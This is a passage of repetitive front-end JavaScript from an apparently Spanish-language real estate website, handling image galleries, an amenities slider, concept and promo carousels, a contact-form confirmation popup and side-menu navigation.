document.getElementById("Galeria5").classList.add("GaleriaSelect0");
document.getElementById("Galeria5").classList.remove("GaleriaSelect1");
document.getElementById("Galeria6").classList.add("GaleriaSelect0");
document.getElementById("Galeria6").classList.remove("GaleriaSelect1");
document.getElementById("Galeria7").classList.add("GaleriaSelect0");
document.getElementById("Galeria7").classList.remove("GaleriaSelect1");
}else if(IdGaleria == '3'){
document.getElementById("GaleriaImgP").src="img/Galeria/gdes/3_imagen.jpg"
document.getElementById("NoGaleria").innerHTML="3"
document.getElementById("GaleriaImgP").name= IdGaleria
document.getElementById("IzqGaleria").name= IdGaleria
document.getElementById("DerGaleria").name= IdGaleria
document.getElementById("Galeria1").classList.add("GaleriaSelect0");
document.getElementById("Galeria1").classList.remove("GaleriaSelect1");
document.getElementById("Galeria2").classList.add("GaleriaSelect0");
document.getElementById("Galeria2").classList.remove("GaleriaSelect1");
document.getElementById("Galeria3").classList.add("GaleriaSelect1");
document.getElementById("Galeria3").classList.remove("GaleriaSelect0");
document.getElementById("Galeria4").classList.add("GaleriaSelect0");
document.getElementById("Galeria4").classList.remove("GaleriaSelect1");
document.getElementById("Galeria5").classList.add("GaleriaSelect0");
document.getElementById("Galeria5").classList.remove("GaleriaSelect1");
document.getElementById("Galeria6").classList.add("GaleriaSelect0");
document.getElementById("Galeria6").classList.remove("GaleriaSelect1");
document.getElementById("Galeria7").classList.add("GaleriaSelect0");
document.getElementById("Galeria7").classList.remove("GaleriaSelect1");
}else if(IdGaleria == '4'){
document.getElementById("GaleriaImgP").src="img/Galeria/gdes/4_imagen.jpg"
document.getElementById("NoGaleria").innerHTML="4"
document.getElementById("GaleriaImgP").name= IdGaleria
document.getElementById("IzqGaleria").name= IdGaleria
document.getElementById("DerGaleria").name= IdGaleria
document.getElementById("Galeria1").classList.add("GaleriaSelect0");
document.getElementById("Galeria1").classList.remove("GaleriaSelect1");
document.getElementById("Galeria2").classList.add("GaleriaSelect0");
document.getElementById("Galeria2").classList.remove("GaleriaSelect1");
document.getElementById("Galeria3").classList.add("GaleriaSelect0");
document.getElementById("Galeria3").classList.remove("GaleriaSelect1");
document.getElementById("Galeria4").classList.add("GaleriaSelect1");
document.getElementById("Galeria4").classList.remove("GaleriaSelect0");
document.getElementById("Galeria5").classList.add("GaleriaSelect0");
document.getElementById("Galeria5").classList.remove("GaleriaSelect1");
document.getElementById("Galeria6").classList.add("GaleriaSelect0");
document.getElementById("Galeria6").classList.remove("GaleriaSelect1");
document.getElementById("Galeria7").classList.add("GaleriaSelect0");
document.getElementById("Galeria7").classList.remove("GaleriaSelect1");
}else if(IdGaleria == '5'){
document.getElementById("GaleriaImgP").src="img/Galeria/gdes/5_imagen.jpg"
document.getElementById("NoGaleria").innerHTML="5"
document.getElementById("GaleriaImgP").name= IdGaleria
document.getElementById("IzqGaleria").name= IdGaleria
document.getElementById("DerGaleria").name= IdGaleria
document.getElementById("Galeria1").classList.add("GaleriaSelect0");
document.getElementById("Galeria1").classList.remove("GaleriaSelect1");
document.getElementById("Galeria2").classList.add("GaleriaSelect0");
document.getElementById("Galeria2").classList.remove("GaleriaSelect1");
document.getElementById("Galeria3").classList.add("GaleriaSelect0");
document.getElementById("Galeria3").classList.remove("GaleriaSelect1");
document.getElementById("Galeria4").classList.add("GaleriaSelect0");
document.getElementById("Galeria4").classList.remove("GaleriaSelect1");
document.getElementById("Galeria5").classList.add("GaleriaSelect1");
document.getElementById("Galeria5").classList.remove("GaleriaSelect0");
document.getElementById("Galeria6").classList.add("GaleriaSelect0");
document.getElementById("Galeria6").classList.remove("GaleriaSelect1");
document.getElementById("Galeria7").classList.add("GaleriaSelect0");
document.getElementById("Galeria7").classList.remove("GaleriaSelect1");
}else if(IdGaleria == '6'){
document.getElementById("GaleriaImgP").src="img/Galeria/gdes/6_imagen.jpg"
document.getElementById("NoGaleria").innerHTML="6"
document.getElementById("GaleriaImgP").name= IdGaleria
document.getElementById("IzqGaleria").name= IdGaleria
document.getElementById("DerGaleria").name= IdGaleria
document.getElementById("Galeria1").classList.add("GaleriaSelect0");
document.getElementById("Galeria1").classList.remove("GaleriaSelect1");
document.getElementById("Galeria2").classList.add("GaleriaSelect0");
document.getElementById("Galeria2").classList.remove("GaleriaSelect1");
document.getElementById("Galeria3").classList.add("GaleriaSelect0");
document.getElementById("Galeria3").classList.remove("GaleriaSelect1");
document.getElementById("Galeria4").classList.add("GaleriaSelect0");
document.getElementById("Galeria4").classList.remove("GaleriaSelect1");
document.getElementById("Galeria5").classList.add("GaleriaSelect0");
document.getElementById("Galeria5").classList.remove("GaleriaSelect1");
document.getElementById("Galeria6").classList.add("GaleriaSelect1");
document.getElementById("Galeria6").classList.remove("GaleriaSelect0");
document.getElementById("Galeria7").classList.add("GaleriaSelect0");
document.getElementById("Galeria7").classList.remove("GaleriaSelect1");
}else if(IdGaleria == '7'){
document.getElementById("GaleriaImgP").src="img/Galeria/gdes/7_imagen.jpg"
document.getElementById("NoGaleria").innerHTML="7"
document.getElementById("GaleriaImgP").name= IdGaleria
document.getElementById("IzqGaleria").name= IdGaleria
document.getElementById("DerGaleria").name= IdGaleria
document.getElementById("Galeria1").classList.add("GaleriaSelect0");
document.getElementById("Galeria1").classList.remove("GaleriaSelect1");
document.getElementById("Galeria2").classList.add("GaleriaSelect0");
document.getElementById("Galeria2").classList.remove("GaleriaSelect1");
document.getElementById("Galeria3").classList.add("GaleriaSelect0");
document.getElementById("Galeria3").classList.remove("GaleriaSelect1");
document.getElementById("Galeria4").classList.add("GaleriaSelect0");
document.getElementById("Galeria4").classList.remove("GaleriaSelect1");
document.getElementById("Galeria5").classList.add("GaleriaSelect0");
document.getElementById("Galeria5").classList.remove("GaleriaSelect1");
document.getElementById("Galeria6").classList.add("GaleriaSelect0");
document.getElementById("Galeria6").classList.remove("GaleriaSelect1");
document.getElementById("Galeria7").classList.add("GaleriaSelect1");
document.getElementById("Galeria7").classList.remove("GaleriaSelect0");
}
}
</script>
<!--SLIDER-->
<script>
function Amenidad1(){
document.getElementById("Amenidad1").src="img/6/desc/1_GYM.jpg"
document.getElementById("Amenidad2").src="img/6/bn/2_SalonUM.jpg"
document.getElementById("Amenidad4").src="img/6/bn/4_Wifi.jpg"
document.getElementById("Amenidad5").src="img/6/bn/5_Barda.jpg"
document.getElementById("Amenidad6").src="img/6/bn/6_Video.jpg"
document.getElementById("Amenidad7").src="img/6/bn/7_Acceso.jpg"
document.getElementById("numeroAmenidad").innerHTML="1"
document.getElementById("desc1").style.display="block"
document.getElementById("desc2").style.display="none"
document.getElementById("desc4").style.display="none"
document.getElementById("desc5").style.display="none"
document.getElementById("desc6").style.display="none"
document.getElementById("desc7").style.display="none"
}function Amenidad2(){
document.getElementById("Amenidad1").src="img/6/bn/1_GYM.jpg"
document.getElementById("Amenidad2").src="img/6/desc/2_SalonUM.jpg"
document.getElementById("Amenidad4").src="img/6/bn/4_Wifi.jpg"
document.getElementById("Amenidad5").src="img/6/bn/5_Barda.jpg"
document.getElementById("Amenidad6").src="img/6/bn/6_Video.jpg"
document.getElementById("Amenidad7").src="img/6/bn/7_Acceso.jpg"
document.getElementById("numeroAmenidad").innerHTML="2"
document.getElementById("desc1").style.display="none"
document.getElementById("desc2").style.display="block"
document.getElementById("desc4").style.display="none"
document.getElementById("desc5").style.display="none"
document.getElementById("desc6").style.display="none"
document.getElementById("desc7").style.display="none"
}function Amenidad4(){
document.getElementById("Amenidad1").src="img/6/bn/1_GYM.jpg"
document.getElementById("Amenidad2").src="img/6/bn/2_SalonUM.jpg"
document.getElementById("Amenidad4").src="img/6/desc/4_Wifi.jpg"
document.getElementById("Amenidad5").src="img/6/bn/5_Barda.jpg"
document.getElementById("Amenidad6").src="img/6/bn/6_Video.jpg"
document.getElementById("Amenidad7").src="img/6/bn/7_Acceso.jpg"
document.getElementById("numeroAmenidad").innerHTML="3"
document.getElementById("desc1").style.display="none"
document.getElementById("desc2").style.display="none"
document.getElementById("desc4").style.display="block"
document.getElementById("desc5").style.display="none"
document.getElementById("desc6").style.display="none"
document.getElementById("desc7").style.display="none"
}function Amenidad5(){
document.getElementById("Amenidad1").src="img/6/bn/1_GYM.jpg"
document.getElementById("Amenidad2").src="img/6/bn/2_SalonUM.jpg"
document.getElementById("Amenidad4").src="img/6/bn/4_Wifi.jpg"
document.getElementById("Amenidad5").src="img/6/desc/5_Barda.jpg"
document.getElementById("Amenidad6").src="img/6/bn/6_Video.jpg"
document.getElementById("Amenidad7").src="img/6/bn/7_Acceso.jpg"
document.getElementById("numeroAmenidad").innerHTML="4"
document.getElementById("desc1").style.display="none"
document.getElementById("desc2").style.display="none"
document.getElementById("desc4").style.display="none"
document.getElementById("desc5").style.display="block"
document.getElementById("desc6").style.display="none"
document.getElementById("desc7").style.display="none"
}function Amenidad6(){
document.getElementById("Amenidad1").src="img/6/bn/1_GYM.jpg"
document.getElementById("Amenidad2").src="img/6/bn/2_SalonUM.jpg"
document.getElementById("Amenidad4").src="img/6/bn/4_Wifi.jpg"
document.getElementById("Amenidad5").src="img/6/bn/5_Barda.jpg"
document.getElementById("Amenidad6").src="img/6/desc/6_Video.jpg"
document.getElementById("Amenidad7").src="img/6/bn/7_Acceso.jpg"
document.getElementById("numeroAmenidad").innerHTML="5"
document.getElementById("desc1").style.display="none"
document.getElementById("desc2").style.display="none"
document.getElementById("desc4").style.display="none"
document.getElementById("desc5").style.display="none"
document.getElementById("desc6").style.display="block"
document.getElementById("desc7").style.display="none"
}function Amenidad7(){
document.getElementById("Amenidad1").src="img/6/bn/1_GYM.jpg"
document.getElementById("Amenidad2").src="img/6/bn/2_SalonUM.jpg"
document.getElementById("Amenidad4").src="img/6/bn/4_Wifi.jpg"
document.getElementById("Amenidad5").src="img/6/bn/5_Barda.jpg"
document.getElementById("Amenidad6").src="img/6/bn/6_Video.jpg"
document.getElementById("Amenidad7").src="img/6/desc/7_Acceso.jpg"
document.getElementById("numeroAmenidad").innerHTML="6"
document.getElementById("desc1").style.display="none"
document.getElementById("desc2").style.display="none"
document.getElementById("desc4").style.display="none"
document.getElementById("desc5").style.display="none"
document.getElementById("desc6").style.display="none"
document.getElementById("desc7").style.display="block"
}
if (screen.width > 1000){
function derecha(){
if(document.getElementById("rowslideul").classList.contains("0")){
document.getElementById("rowslideul").style.left = "-51%"
document.getElementById("rowslideul").classList.remove("0");
document.getElementById("rowslideul").classList.add("51");
}else{
document.getElementById("rowslideul").style.left = "0%"
document.getElementById("rowslideul").classList.remove("51");
document.getElementById("rowslideul").classList.add("0");
}
}function izquierda(){
if(document.getElementById("rowslideul").classList.contains("0")){
document.getElementById("rowslideul").style.left = "-51%"
document.getElementById("rowslideul").classList.remove("0");
document.getElementById("rowslideul").classList.add("51");
}else{
document.getElementById("rowslideul").style.left = "0%"
document.getElementById("rowslideul").classList.remove("51");
document.getElementById("rowslideul").classList.add("0");
}
}
}else{
function derecha(){
if(document.getElementById("rowslideul").classList.contains("0")){
document.getElementById("rowslideul").style.left = "-80%"
document.getElementById("rowslideul").classList.remove("0");
document.getElementById("rowslideul").classList.add("80");
}else if(document.getElementById("rowslideul").classList.contains("80")){
document.getElementById("rowslideul").style.left = "-180%"
document.getElementById("rowslideul").classList.remove("80");
document.getElementById("rowslideul").classList.add("180");
}else if(document.getElementById("rowslideul").classList.contains("180")){
document.getElementById("rowslideul").style.left = "-270%"
document.getElementById("rowslideul").classList.remove("180");
document.getElementById("rowslideul").classList.add("270");
}else if(document.getElementById("rowslideul").classList.contains("270")){
document.getElementById("rowslideul").style.left = "-365%"
document.getElementById("rowslideul").classList.remove("270");
document.getElementById("rowslideul").classList.add("365");
}else if(document.getElementById("rowslideul").classList.contains("365")){
document.getElementById("rowslideul").style.left = "-450%"
document.getElementById("rowslideul").classList.remove("365");
document.getElementById("rowslideul").classList.add("450");
}else if(document.getElementById("rowslideul").classList.contains("450")){
document.getElementById("rowslideul").style.left = "0%"
document.getElementById("rowslideul").classList.remove("450");
document.getElementById("rowslideul").classList.add("0");
}
}function izquierda(){
if(document.getElementById("rowslideul").classList.contains("450")){
document.getElementById("rowslideul").style.left = "-365%"
document.getElementById("rowslideul").classList.remove("450");
document.getElementById("rowslideul").classList.add("365");
}else if(document.getElementById("rowslideul").classList.contains("365")){
document.getElementById("rowslideul").style.left = "-270%"
document.getElementById("rowslideul").classList.remove("365");
document.getElementById("rowslideul").classList.add("270");
}else if(document.getElementById("rowslideul").classList.contains("270")){
document.getElementById("rowslideul").style.left = "-180%"
document.getElementById("rowslideul").classList.remove("270");
document.getElementById("rowslideul").classList.add("180");
}else if(document.getElementById("rowslideul").classList.contains("180")){
document.getElementById("rowslideul").style.left = "-80%"
document.getElementById("rowslideul").classList.remove("180");
document.getElementById("rowslideul").classList.add("80");
}else if(document.getElementById("rowslideul").classList.contains("80")){
document.getElementById("rowslideul").style.left = "0%"
document.getElementById("rowslideul").classList.remove("80");
document.getElementById("rowslideul").classList.add("0");
}else if(document.getElementById("rowslideul").classList.contains("0")){
document.getElementById("rowslideul").style.left = "-450%"
document.getElementById("rowslideul").classList.remove("0");
document.getElementById("rowslideul").classList.add("450");
}
}
}
</script>
<!--CambiaConcepto-->
<script>
function CambiaConceptoDer(){
if(document.getElementById("imagenConcepto").classList.contains("Concepto1")){
document.getElementById("imagenConcepto").src = "img/Concepto/2_Concepto.png";
document.getElementById("textoConcepto").innerHTML = "Privacidad y exclusividad en un complejo residencial con terrenos amplios y limitados.";
document.getElementById("NumFoto").innerHTML = "2";
document.getElementById("imagenConcepto").classList.remove("Concepto1");
document.getElementById("imagenConcepto").classList.add("Concepto2");
document.getElementById("imagenConcepto").classList.remove("Concepto3");
document.getElementById("imagenConcepto").classList.remove("Concepto4");
document.getElementById("imagenConcepto").classList.remove("Concepto5");
document.getElementById("imagenConcepto").classList.remove("Concepto6");
document.getElementById("imagenConcepto").classList.remove("Concepto7");
}else if(document.getElementById("imagenConcepto").classList.contains("Concepto2")){
document.getElementById("imagenConcepto").src = "img/Concepto/3_Concepto.png";
document.getElementById("textoConcepto").innerHTML = "Privacidad y exclusividad en un complejo residencial con terrenos amplios y limitados.";
document.getElementById("NumFoto").innerHTML = "3";
document.getElementById("imagenConcepto").classList.remove("Concepto1");
document.getElementById("imagenConcepto").classList.remove("Concepto2");
document.getElementById("imagenConcepto").classList.add("Concepto3");
document.getElementById("imagenConcepto").classList.remove("Concepto4");
document.getElementById("imagenConcepto").classList.remove("Concepto5");
document.getElementById("imagenConcepto").classList.remove("Concepto6");
document.getElementById("imagenConcepto").classList.remove("Concepto7");
}else if(document.getElementById("imagenConcepto").classList.contains("Concepto3")){
document.getElementById("imagenConcepto").src = "img/Concepto/4_Concepto.png";
document.getElementById("textoConcepto").innerHTML = "Privacidad y exclusividad en un complejo residencial con terrenos amplios y limitados.";
document.getElementById("NumFoto").innerHTML = "4";
document.getElementById("imagenConcepto").classList.remove("Concepto1");
document.getElementById("imagenConcepto").classList.remove("Concepto2");
document.getElementById("imagenConcepto").classList.remove("Concepto3");
document.getElementById("imagenConcepto").classList.add("Concepto4");
document.getElementById("imagenConcepto").classList.remove("Concepto5");
document.getElementById("imagenConcepto").classList.remove("Concepto6");
document.getElementById("imagenConcepto").classList.remove("Concepto7");
}else if(document.getElementById("imagenConcepto").classList.contains("Concepto4")){
document.getElementById("imagenConcepto").src = "img/Concepto/5_Concepto.png";
document.getElementById("textoConcepto").innerHTML = "Privacidad y exclusividad en un complejo residencial con terrenos amplios y limitados.";
document.getElementById("NumFoto").innerHTML = "5";
document.getElementById("imagenConcepto").classList.remove("Concepto1");
document.getElementById("imagenConcepto").classList.remove("Concepto2");
document.getElementById("imagenConcepto").classList.remove("Concepto3");
document.getElementById("imagenConcepto").classList.remove("Concepto4");
document.getElementById("imagenConcepto").classList.add("Concepto5");
document.getElementById("imagenConcepto").classList.remove("Concepto6");
document.getElementById("imagenConcepto").classList.remove("Concepto7");
}else if(document.getElementById("imagenConcepto").classList.contains("Concepto5")){
document.getElementById("imagenConcepto").src = "img/Concepto/6_Concepto.png";
document.getElementById("textoConcepto").innerHTML = "Privacidad y exclusividad en un complejo residencial con terrenos amplios y limitados.";
document.getElementById("NumFoto").innerHTML = "6";
document.getElementById("imagenConcepto").classList.remove("Concepto1");
document.getElementById("imagenConcepto").classList.remove("Concepto2");
document.getElementById("imagenConcepto").classList.remove("Concepto3");
document.getElementById("imagenConcepto").classList.remove("Concepto4");
document.getElementById("imagenConcepto").classList.remove("Concepto5");
document.getElementById("imagenConcepto").classList.add("Concepto6");
document.getElementById("imagenConcepto").classList.remove("Concepto7");
}else if(document.getElementById("imagenConcepto").classList.contains("Concepto6")){
document.getElementById("imagenConcepto").src = "img/Concepto/7_Concepto.png";
document.getElementById("textoConcepto").innerHTML = "Privacidad y exclusividad en un complejo residencial con terrenos amplios y limitados.";
document.getElementById("NumFoto").innerHTML = "7";
document.getElementById("imagenConcepto").classList.remove("Concepto1");
document.getElementById("imagenConcepto").classList.remove("Concepto2");
document.getElementById("imagenConcepto").classList.remove("Concepto3");
document.getElementById("imagenConcepto").classList.remove("Concepto4");
document.getElementById("imagenConcepto").classList.remove("Concepto5");
document.getElementById("imagenConcepto").classList.remove("Concepto6");
document.getElementById("imagenConcepto").classList.add("Concepto7");
}else if(document.getElementById("imagenConcepto").classList.contains("Concepto7")){
document.getElementById("imagenConcepto").src = "img/Concepto/1_Concepto.png";
document.getElementById("textoConcepto").innerHTML = "Privacidad y exclusividad en un complejo residencial con terrenos amplios y limitados.";
document.getElementById("NumFoto").innerHTML = "1";
document.getElementById("imagenConcepto").classList.add("Concepto1");
document.getElementById("imagenConcepto").classList.remove("Concepto2");
document.getElementById("imagenConcepto").classList.remove("Concepto3");
document.getElementById("imagenConcepto").classList.remove("Concepto4");
document.getElementById("imagenConcepto").classList.remove("Concepto5");
document.getElementById("imagenConcepto").classList.remove("Concepto6");
document.getElementById("imagenConcepto").classList.remove("Concepto7");
}
}
function CambiaConceptoIzq(){
if(document.getElementById("imagenConcepto").classList.contains("Concepto1")){
document.getElementById("imagenConcepto").src = "img/Concepto/7_Concepto.png";
document.getElementById("textoConcepto").innerHTML = "Privacidad y exclusividad en un complejo residencial con terrenos amplios y limitados.";
document.getElementById("NumFoto").innerHTML = "7";
document.getElementById("imagenConcepto").classList.remove("Concepto1");
document.getElementById("imagenConcepto").classList.remove("Concepto2");
document.getElementById("imagenConcepto").classList.remove("Concepto3");
document.getElementById("imagenConcepto").classList.remove("Concepto4");
document.getElementById("imagenConcepto").classList.remove("Concepto5");
document.getElementById("imagenConcepto").classList.remove("Concepto6");
document.getElementById("imagenConcepto").classList.add("Concepto7");
}else if(document.getElementById("imagenConcepto").classList.contains("Concepto7")){
document.getElementById("imagenConcepto").src = "img/Concepto/6_Concepto.png";
document.getElementById("textoConcepto").innerHTML = "Privacidad y exclusividad en un complejo residencial con terrenos amplios y limitados.";
document.getElementById("NumFoto").innerHTML = "6";
document.getElementById("imagenConcepto").classList.remove("Concepto1");
document.getElementById("imagenConcepto").classList.remove("Concepto2");
document.getElementById("imagenConcepto").classList.remove("Concepto3");
document.getElementById("imagenConcepto").classList.remove("Concepto4");
document.getElementById("imagenConcepto").classList.remove("Concepto5");
document.getElementById("imagenConcepto").classList.add("Concepto6");
document.getElementById("imagenConcepto").classList.remove("Concepto7");
}else if(document.getElementById("imagenConcepto").classList.contains("Concepto6")){
document.getElementById("imagenConcepto").src = "img/Concepto/5_Concepto.png";
document.getElementById("textoConcepto").innerHTML = "Privacidad y exclusividad en un complejo residencial con terrenos amplios y limitados.";
document.getElementById("NumFoto").innerHTML = "5";
document.getElementById("imagenConcepto").classList.remove("Concepto1");
document.getElementById("imagenConcepto").classList.remove("Concepto2");
document.getElementById("imagenConcepto").classList.remove("Concepto3");
document.getElementById("imagenConcepto").classList.remove("Concepto4");
document.getElementById("imagenConcepto").classList.add("Concepto5");
document.getElementById("imagenConcepto").classList.remove("Concepto6");
document.getElementById("imagenConcepto").classList.remove("Concepto7");
}else if(document.getElementById("imagenConcepto").classList.contains("Concepto5")){
document.getElementById("imagenConcepto").src = "img/Concepto/4_Concepto.png";
document.getElementById("textoConcepto").innerHTML = "Privacidad y exclusividad en un complejo residencial con terrenos amplios y limitados.";
document.getElementById("NumFoto").innerHTML = "4";
document.getElementById("imagenConcepto").classList.remove("Concepto1");
document.getElementById("imagenConcepto").classList.remove("Concepto2");
document.getElementById("imagenConcepto").classList.remove("Concepto3");
document.getElementById("imagenConcepto").classList.add("Concepto4");
document.getElementById("imagenConcepto").classList.remove("Concepto5");
document.getElementById("imagenConcepto").classList.remove("Concepto6");
document.getElementById("imagenConcepto").classList.remove("Concepto7");
}else if(document.getElementById("imagenConcepto").classList.contains("Concepto4")){
document.getElementById("imagenConcepto").src = "img/Concepto/3_Concepto.png";
document.getElementById("textoConcepto").innerHTML = "Privacidad y exclusividad en un complejo residencial con terrenos amplios y limitados.";
document.getElementById("NumFoto").innerHTML = "3";
document.getElementById("imagenConcepto").classList.remove("Concepto1");
document.getElementById("imagenConcepto").classList.remove("Concepto2");
document.getElementById("imagenConcepto").classList.add("Concepto3");
document.getElementById("imagenConcepto").classList.remove("Concepto4");
document.getElementById("imagenConcepto").classList.remove("Concepto5");
document.getElementById("imagenConcepto").classList.remove("Concepto6");
document.getElementById("imagenConcepto").classList.remove("Concepto7");
}else if(document.getElementById("imagenConcepto").classList.contains("Concepto3")){
document.getElementById("imagenConcepto").src = "img/Concepto/2_Concepto.png";
document.getElementById("textoConcepto").innerHTML = "Privacidad y exclusividad en un complejo residencial con terrenos amplios y limitados.";
document.getElementById("NumFoto").innerHTML = "2";
document.getElementById("imagenConcepto").classList.remove("Concepto1");
document.getElementById("imagenConcepto").classList.add("Concepto2");
document.getElementById("imagenConcepto").classList.remove("Concepto3");
document.getElementById("imagenConcepto").classList.remove("Concepto4");
document.getElementById("imagenConcepto").classList.remove("Concepto5");
document.getElementById("imagenConcepto").classList.remove("Concepto6");
document.getElementById("imagenConcepto").classList.remove("Concepto7");
}else if(document.getElementById("imagenConcepto").classList.contains("Concepto2")){
document.getElementById("imagenConcepto").src = "img/Concepto/1_Concepto.png";
document.getElementById("textoConcepto").innerHTML = "Privacidad y exclusividad en un complejo residencial con terrenos amplios y limitados.";
document.getElementById("NumFoto").innerHTML = "1";
document.getElementById("imagenConcepto").classList.add("Concepto1");
document.getElementById("imagenConcepto").classList.remove("Concepto2");
document.getElementById("imagenConcepto").classList.remove("Concepto3");
document.getElementById("imagenConcepto").classList.remove("Concepto4");
document.getElementById("imagenConcepto").classList.remove("Concepto5");
document.getElementById("imagenConcepto").classList.remove("Concepto6");
document.getElementById("imagenConcepto").classList.remove("Concepto7");
}
}
</script>
<!--CambiaPromo-->
<script>
function CambiaPromo1(){
if(document.getElementById("Promo1").classList.contains("opcPromos0")){
document.getElementById("Promo1").classList.remove("opcPromos0");
document.getElementById("LinePromo1").classList.remove("lineOpcPromos0");
document.getElementById("Promo1").classList.add("opcPromos1");
document.getElementById("LinePromo1").classList.add("lineOpcPromos1");
document.getElementById("Promo2").classList.remove("opcPromos1");
document.getElementById("LinePromo2").classList.remove("lineOpcPromos1");
document.getElementById("Promo2").classList.add("opcPromos0");
document.getElementById("LinePromo2").classList.add("lineOpcPromos0");
document.getElementById("Promo3").classList.remove("opcPromos1");
document.getElementById("LinePromo3").classList.remove("lineOpcPromos1");
document.getElementById("Promo3").classList.add("opcPromos0");
document.getElementById("LinePromo3").classList.add("lineOpcPromos0");
document.getElementById("Promo4").classList.remove("opcPromos1");
document.getElementById("LinePromo4").classList.remove("lineOpcPromos1");
document.getElementById("Promo4").classList.add("opcPromos0");
document.getElementById("LinePromo4").classList.add("lineOpcPromos0");
}
}function CambiaPromo2(){
if(document.getElementById("Promo2").classList.contains("opcPromos0")){
document.getElementById("Promo1").classList.remove("opcPromos1");
document.getElementById("LinePromo1").classList.remove("lineOpcPromos1");
document.getElementById("Promo1").classList.add("opcPromos0");
document.getElementById("LinePromo1").classList.add("lineOpcPromos0");
document.getElementById("Promo2").classList.remove("opcPromos0");
document.getElementById("LinePromo2").classList.remove("lineOpcPromos0");
document.getElementById("Promo2").classList.add("opcPromos1");
document.getElementById("LinePromo2").classList.add("lineOpcPromos1");
document.getElementById("Promo3").classList.remove("opcPromos1");
document.getElementById("LinePromo3").classList.remove("lineOpcPromos1");
document.getElementById("Promo3").classList.add("opcPromos0");
document.getElementById("LinePromo3").classList.add("lineOpcPromos0");
document.getElementById("Promo4").classList.remove("opcPromos1");
document.getElementById("LinePromo4").classList.remove("lineOpcPromos1");
document.getElementById("Promo4").classList.add("opcPromos0");
document.getElementById("LinePromo4").classList.add("lineOpcPromos0");
}
}function CambiaPromo3(){
if(document.getElementById("Promo3").classList.contains("opcPromos0")){
document.getElementById("Promo1").classList.remove("opcPromos1");
document.getElementById("LinePromo1").classList.remove("lineOpcPromos1");
document.getElementById("Promo1").classList.add("opcPromos0");
document.getElementById("LinePromo1").classList.add("lineOpcPromos0");
document.getElementById("Promo2").classList.remove("opcPromos1");
document.getElementById("LinePromo2").classList.remove("lineOpcPromos1");
document.getElementById("Promo2").classList.add("opcPromos0");
document.getElementById("LinePromo2").classList.add("lineOpcPromos0");
document.getElementById("Promo3").classList.remove("opcPromos0");
document.getElementById("LinePromo3").classList.remove("lineOpcPromos0");
document.getElementById("Promo3").classList.add("opcPromos1");
document.getElementById("LinePromo3").classList.add("lineOpcPromos1");
document.getElementById("Promo4").classList.remove("opcPromos1");
document.getElementById("LinePromo4").classList.remove("lineOpcPromos1");
document.getElementById("Promo4").classList.add("opcPromos0");
document.getElementById("LinePromo4").classList.add("lineOpcPromos0");
}
}function CambiaPromo4(){
if(document.getElementById("Promo4").classList.contains("opcPromos0")){
document.getElementById("Promo1").classList.remove("opcPromos1");
document.getElementById("LinePromo1").classList.remove("lineOpcPromos1");
document.getElementById("Promo1").classList.add("opcPromos0");
document.getElementById("LinePromo1").classList.add("lineOpcPromos0");
document.getElementById("Promo2").classList.remove("opcPromos1");
document.getElementById("LinePromo2").classList.remove("lineOpcPromos1");
document.getElementById("Promo2").classList.add("opcPromos0");
document.getElementById("LinePromo2").classList.add("lineOpcPromos0");
document.getElementById("Promo3").classList.remove("opcPromos1");
document.getElementById("LinePromo3").classList.remove("lineOpcPromos1");
document.getElementById("Promo3").classList.add("opcPromos0");
document.getElementById("LinePromo3").classList.add("lineOpcPromos0");
document.getElementById("Promo4").classList.remove("opcPromos0");
document.getElementById("LinePromo4").classList.remove("lineOpcPromos0");
document.getElementById("Promo4").classList.add("opcPromos1");
document.getElementById("LinePromo4").classList.add("lineOpcPromos1");
}
}
</script>
<!--CambiaImgInicio-->
<script src="https://code.jquery.com/jquery-3.2.1.js"></script>
<script>
function CambiaImgInicioD(){
if(document.getElementById("InicioFondo").classList.contains("InicioFondo1")){
document.getElementById("InicioFondo").classList.remove("InicioFondo1");
document.getElementById("InicioFondo").classList.add("InicioFondo2");
document.getElementById("FIZQ").innerHTML = "01";
document.getElementById("FDER").innerHTML = "03";
}else if(document.getElementById("InicioFondo").classList.contains("InicioFondo2")){
document.getElementById("InicioFondo").classList.remove("InicioFondo2");
document.getElementById("InicioFondo").classList.add("InicioFondo4");
document.getElementById("FIZQ").innerHTML = "02";
document.getElementById("FDER").innerHTML = "01";
}else if(document.getElementById("InicioFondo").classList.contains("InicioFondo4")){
document.getElementById("InicioFondo").classList.remove("InicioFondo4");
document.getElementById("InicioFondo").classList.add("InicioFondo1");
document.getElementById("FIZQ").innerHTML = "03";
document.getElementById("FDER").innerHTML = "02";
}
}
function CambiaImgInicioI(){
if(document.getElementById("InicioFondo").classList.contains("InicioFondo1")){
document.getElementById("InicioFondo").classList.remove("InicioFondo1");
document.getElementById("InicioFondo").classList.add("InicioFondo4");
document.getElementById("FIZQ").innerHTML = "03";
document.getElementById("FDER").innerHTML = "01";
}else if(document.getElementById("InicioFondo").classList.contains("InicioFondo4")){
document.getElementById("InicioFondo").classList.remove("InicioFondo4");
document.getElementById("InicioFondo").classList.add("InicioFondo3");
document.getElementById("FIZQ").innerHTML = "02";
document.getElementById("FDER").innerHTML = "04";
}else if(document.getElementById("InicioFondo").classList.contains("InicioFondo3")){
document.getElementById("InicioFondo").classList.remove("InicioFondo3");
document.getElementById("InicioFondo").classList.add("InicioFondo2");
document.getElementById("FIZQ").innerHTML = "01";
document.getElementById("FDER").innerHTML = "03";
}else if(document.getElementById("InicioFondo").classList.contains("InicioFondo2")){
document.getElementById("InicioFondo").classList.remove("InicioFondo2");
document.getElementById("InicioFondo").classList.add("InicioFondo1");
document.getElementById("FIZQ").innerHTML = "04";
document.getElementById("FDER").innerHTML = "02";
}
}
setInterval(CambiaImgInicioD, 5000);
</script>
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@9"></script>
<script>
function ContactoEnviado(){
console.log("alerta");
Swal.fire({
icon: 'success',
title: 'Mensaje enviado',
text: 'Hemos recibido tu mensaje, pronto nos pondremos en contacto contigo'
});
setTimeout('document.forms[0].reset()', 1000);
$("#calendario").addClass("hidden");
}
</script>
<script>
if (screen.width > 500) {
function openNav() {
document.getElementById("mySidenav").style.width = "100%";
document.getElementById("main").style.marginRight = "0px";
document.body.style.backgroundColor = "white";
document.getElementById("openbtn").style.opacity = "0";
document.getElementById("closebtn").style.display = "block";
document.getElementById("closebtn").style.opacity = "1";
document.getElementById("closediv").style.opacity = "1";
document.getElementById("divMH").style.opacity = "1";
document.getElementById("divMH").style.transition = "2s";
}
function closeNav() {
document.getElementById("mySidenav").style.width = "0";
document.getElementById("main").style.marginRight= "0";
document.body.style.backgroundColor = "white";
document.getElementById("openbtn").style.opacity = "1";
document.getElementById("closebtn").style.display = "none";
